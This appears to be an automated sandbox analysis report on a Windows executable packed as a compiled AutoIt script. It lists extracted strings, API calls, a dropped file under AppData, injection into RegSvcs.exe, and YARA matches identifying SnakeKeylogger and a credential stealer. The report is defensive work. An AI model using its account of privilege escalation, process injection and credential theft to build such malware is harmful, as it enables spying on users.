Source: eLo1khn7DQ.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_34a3b888-d
Source: lustring.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9a3fba1b-7
Source: lustring.exe.0.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ae88d5b2-b

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0025D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0025D5EB

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_00251201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00251201

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0025E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0025E8F6
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0014E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_0014E8F6

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_001FBF40	0_2_001FBF40
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00262046	0_2_00262046
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_001F8060	0_2_001F8060
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00258298	0_2_00258298
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0022E4FF	0_2_0022E4FF
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0022676B	0_2_0022676B
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00284873	0_2_00284873
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0021CAA0	0_2_0021CAA0
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_001FCAF0	0_2_001FCAF0
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0020CC39	0_2_0020CC39
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00226DD9	0_2_00226DD9
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0020B119	0_2_0020B119
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_001F91C0	0_2_001F91C0
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00211394	0_2_00211394
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00211706	0_2_00211706
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0021781B	0_2_0021781B
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_001F7920	0_2_001F7920
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0020997D	0_2_0020997D
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002119B0	0_2_002119B0
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00217A4A	0_2_00217A4A
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00211C77	0_2_00211C77
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00217CA7	0_2_00217CA7
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0027BE44	0_2_0027BE44
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00229EEE	0_2_00229EEE
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00211F32	0_2_00211F32
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00E5C658	0_2_00E5C658
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00152046	2_2_00152046
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000E8060	2_2_000E8060
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00148298	2_2_00148298
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0011E4FF	2_2_0011E4FF
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0011676B	2_2_0011676B
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00174873	2_2_00174873
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0010CAA0	2_2_0010CAA0
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000ECAF0	2_2_000ECAF0
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000FCC39	2_2_000FCC39
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00116DD9	2_2_00116DD9
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000FB119	2_2_000FB119
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000E91C0	2_2_000E91C0
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00101394	2_2_00101394
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00101706	2_2_00101706
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0010781B	2_2_0010781B
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000E7920	2_2_000E7920
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000F997D	2_2_000F997D
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001019B0	2_2_001019B0
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00107A4A	2_2_00107A4A
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00101C77	2_2_00101C77
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00107CA7	2_2_00107CA7
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0016BE44	2_2_0016BE44
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00119EEE	2_2_00119EEE
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00101F32	2_2_00101F32
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_01560278	2_2_01560278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF4338	3_2_00CF4338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF8DA0	3_2_00CF8DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF5968	3_2_00CF5968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF5F90	3_2_00CF5F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF2DD1	3_2_00CF2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06964D0C	3_2_06964D0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_069636D8	3_2_069636D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06966090	3_2_06966090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06967C31	3_2_06967C31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0696CB98	3_2_0696CB98
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 7_2_015C1290	7_2_015C1290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00F560E0	8_2_00F560E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00F54338	8_2_00F54338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00F58DA0	8_2_00F58DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00F55968	8_2_00F55968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00F52DD1	8_2_00F52DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FC668	8_2_056FC668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FC010	8_2_056FC010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F7210	8_2_056F7210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F2CF0	8_2_056F2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FEE70	8_2_056FEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F78E0	8_2_056F78E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FE5C0	8_2_056FE5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FE5B0	8_2_056FE5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FD460	8_2_056FD460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FD450	8_2_056FD450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FB760	8_2_056FB760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FB750	8_2_056FB750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F77E6	8_2_056F77E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FC658	8_2_056FC658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FE168	8_2_056FE168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FE158	8_2_056FE158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F0040	8_2_056F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F0006	8_2_056F0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FC001	8_2_056FC001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FB308	8_2_056FB308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FB2F9	8_2_056FB2F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FDD00	8_2_056FDD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FDD10	8_2_056FDD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F2CE2	8_2_056F2CE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F6FF0	8_2_056F6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FAEA1	8_2_056FAEA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FAEB0	8_2_056FAEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F6868	8_2_056F6868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056F6858	8_2_056F6858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FD8A8	8_2_056FD8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FD8B8	8_2_056FD8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FBBA8	8_2_056FBBA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FBBB8	8_2_056FBBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FAA49	8_2_056FAA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FAA58	8_2_056FAA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FEA09	8_2_056FEA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_056FEA18	8_2_056FEA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06604D0C	8_2_06604D0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_066036D8	8_2_066036D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06606090	8_2_06606090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06607C31	8_2_06607C31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_06604D00	8_2_06604D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0660CB98	8_2_0660CB98

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: String function: 001F9CB3 appears 31 times
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: String function: 00210A30 appears 46 times
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: String function: 0020F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: String function: 000FF9F2 appears 40 times
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: String function: 000E9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: String function: 00100A30 appears 46 times

Source: eLo1khn7DQ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_002637B5 GetLastError,FormatMessageW,

0_2_002637B5

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002510BF AdjustTokenPrivileges,CloseHandle,	0_2_002510BF
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_002516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_002516C3
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001410BF AdjustTokenPrivileges,CloseHandle,	2_2_001410BF
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_001416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_001416C3

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_002651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002651CD

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0027A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0027A67C

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0026648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0026648E

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_001F42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001F42A2

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

File created: C:\Users\user\AppData\Local\done

Jump to behavior
